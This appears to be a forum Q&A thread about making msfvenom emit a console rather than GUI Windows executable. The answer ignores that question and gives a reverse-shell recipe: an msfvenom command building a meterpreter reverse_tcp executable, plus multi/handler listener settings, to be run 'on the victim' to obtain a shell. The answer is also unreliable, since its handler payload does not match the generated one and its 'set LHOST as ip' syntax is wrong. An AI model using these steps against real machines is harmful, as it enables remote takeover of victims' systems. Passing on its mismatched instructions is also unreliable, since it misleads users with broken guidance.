# msfvenom how to generate windows console executable

Tags: metasploit

Regular msfvenom would generate a `PE32 executable (GUI)`, does anyone know how to generate a `PE32 executable (CONSOLE)` binary?

e.g.

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe -o shellmet.exe`

would generate a `PE32 executable (GUI)`.

what if I want a `PE32 executable (CONSOLE)` executable?

Answer (score 0):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe -o shellmet.exe

Now, we will use multi/handler, which is a stub that handles exploits launched outside of the framework.

use exploit/multi/handler

When using the exploit/multi/handler module, we still need to tell it which payload to expect so we configure it to have the same settings as the executable we generated.

set payload windows/shell/reverse_tcp
set LHOST as ip
set LPORT as port

Now that we have everything set up and ready to go, we run exploit for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us our shell.

Hope it helps!